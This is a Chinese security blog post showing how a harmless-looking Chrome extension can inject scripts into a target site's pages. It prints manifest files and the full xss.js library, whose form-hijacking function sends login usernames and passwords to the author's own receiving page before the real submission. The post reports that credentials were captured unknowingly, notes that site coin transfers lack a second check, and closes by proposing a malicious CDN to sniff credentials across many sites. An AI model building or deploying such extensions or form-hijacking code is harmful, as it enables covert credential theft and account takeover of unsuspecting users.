- 利用Chrome插件向指定页面植入js,劫持 XSS,一些猥琐的想法与实践
我要投稿-
0x00 Chrome插件
--------------------------
这个想法是昨天看到@紫梦芊 的帖子想起来的。
想法如下:
Chrome插件是可以通过manifest.json的控制,向指定页面植入contentscript.js里的脚本的。那么,能不能在一个看似正常的插件里,安放一个小功能:在所有乌云的页面里<script src=//xsser.me></script>呢?
于是,开始实践。(为了方便,只是弹了一个小框框)。
Manifest.json内容:123456789101112131415{"name":"XiaoChaJian","version":"1.0","manifest_version": 2,"author":"VIP","icons": {"128":"icon.png"},"permissions": [],"content_scripts": []}contentscript.js内容:
alert(/xss/);
那么,将弹框换成xsser.me,是不是就能截获想要的cookies了呢?
很遗憾,这种方法在乌云无效,因为乌云的cookies是HTTP-ONLY的。虽然插件上也能获取http-only的cookies(像Edit this cookie和cookie快速模拟一样),但是很麻烦,于是,又有一个猥琐的想法诞生了:在乌云的登录页面中,插入@Sogili的xss.js来劫持表单,是不是就能把用户名和密码发送到我们想要的地方去了呢?
开始实践:
Manifest.json内容:123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232{"name":"JieChiBiaoDan","version":"1.0","manifest_version": 2,"author":"VIP","icons": {"128":"icon.png"},"permissions": [],"content_scripts": [{"js":["contentscript.js"],"matches":]}contentscript.js内容:;;varxss =function(){varx = {'name':'xss.js','version':'0.2.1','author':'长短短(sogili)'};x.x=function(id){returndocument.getElementById(id)};//容错取值x.e=function(_){try{returneval('('+_+')')}catch(e){return''}};//浏览器x.i={i:!!self.ActiveXObject&&(function(){for(varv=6,s=document.createElement('s');s.innerHTML='<![if gt IE '+(v++)+']><i></i><![endif]-->',s.getElementsByTagName('i')[0];);returnv;}()),c:!!self.chrome,f:self.mozPaintCount>-1,o:!!self.opera,s:!self.chrome&&!!self.WebKitPoint};//UAx.ua = navigator.userAgent;//判断是否为苹果手持设备x.apple=/ip(one|ad|od)/i.test(x.ua);//随机数x.rdm=function(){return~~(Math.random()*1e5)};//url编码(UTF8)x.ec=encodeURIComponent;x.html=function(){returndocument.getElementsByTagName('html')[0]||document.write('<html>')||document.getElementsByTagName('html')[0];};/** 销毁一个元素*/x.kill=function(e){e.parentElement.removeChild(e);};/**绑定事件*/x.bind=function(e,name,fn){e.addEventListener?e.addEventListener(name,fn,false):e.attachEvent("on"+name,fn);};/** dom准备完毕时执行函数*/x.ready=function(fn){if(!x.i.i){x.bind(document,'DOMContentLoaded',fn);}else{vars = setInterval(function(){try{document.body.doScroll('left');clearInterval(s);fn();}catch(e){}},4);}}/** 同源检测*/x.o=function(url){varlink = x.dom('<a href="'+encodeURI(url)+'">',1);returnlink.protocol+link.hoatname+':'+(link.port||80)==location.protocol+location.hoatname+':'+(location.port||80);};/** html to dom*/x.dom=function(html,gcsec){vartmp = document.createElement('span');tmp.innerHTML=html;vare = tmp.children[0];e.style.display='none';x.html().appendChild(e);gcsec>>0>0&&setTimeout(function(){x.kill(e);},gcsec*1000);returne;};/** ajax*/x.ajax=function(url,params,callback){(paramsinstanceofFunction)&&(callback=params,params=void(0));varXHR = (!x.o(url)&&window.XDomainRequest)||window.XMLHttpRequest||(function(){returnnewActiveXObject('MSXML2.XMLHTTP')});varxhr =newXHR();xhr.open(params?'post':'get',url);xhr.withCredentials =true;try{params&&xhr.setRequestHeader('content-type','application/x-www-form-urlencoded');}catch(e){}callback&&(xhr.onreadystatechange =function() {(this.readyState == 4 && ((this.status >= 200&&this.status <= 300) ||this.status == 304))&&callback.apply(this,arguments);});xhr.send(params);};/** CSRF*/x.csrf=function(url,params,callback){(paramsinstanceofFunction)&&(callback=params,params=void(0));if(params){varform = x.dom('<form method=post>');form.action=url;for(varnameinparams){varinput = document.createElement('input');input.name=name;input.value=params[name];form.appendChild(input);}variframe = x.dom('<iframe sandboxname=_'+x.rdm()+'_>',6);callback&&setTimeout(function(){x.bind(iframe,'load',callback);},30);form.target=iframe.name;form.submit();}else{varimg =newImage();callback&&(img.onerror=callback);img.src=url;}};/** 表单劫持*/x.xform=function(form,action){form.old_action=form.action,form.old_target=form.target,form.action=action;variframe = x.dom('<iframe name=_'+x.rdm()+'_>');form.target=iframe.name;setTimeout(function(){x.bind(iframe,'load',function(){form.action=form.old_action,form.target=form.old_target,form.onsubmit=null,form.submit();});},30);};/** 函数代理*/x.proxy=function(fn,before,after){returnfunction(){before&&before.apply(this,arguments);varresult = fn.apply(this,arguments);after&&after.apply(this,arguments);returnresult;}};returnx;}();http://vip.yupage.com/wy.php是我做好的一个接收页面,代码如下:
开始测试,打开登录页,填好用户名密码验证码,点击登录,首先会像我的接收页发起POST,然后才会POST乌云。
再去看看,用户名密码已经躺在那里了。
在不知情的情况下,用户名和密码就这样被劫持走了。乌云的wb转账功能可是没有二次验证的哦。
0x01 CDN
---------------
现在有许许多多的网站使用了CDN来进行加速/防D等。
去搜索了下CDN的工作原理,大概是这样的。
用户访问-》自动分配最快的节点-》请求原服务器-------
返回给用户《-返回给节点服务器《-原服务器返回数据<-|
那么,能不能搭建一台恶意的CDN,然后嗅探所有使用了该CDN的网站的用户名密码呢?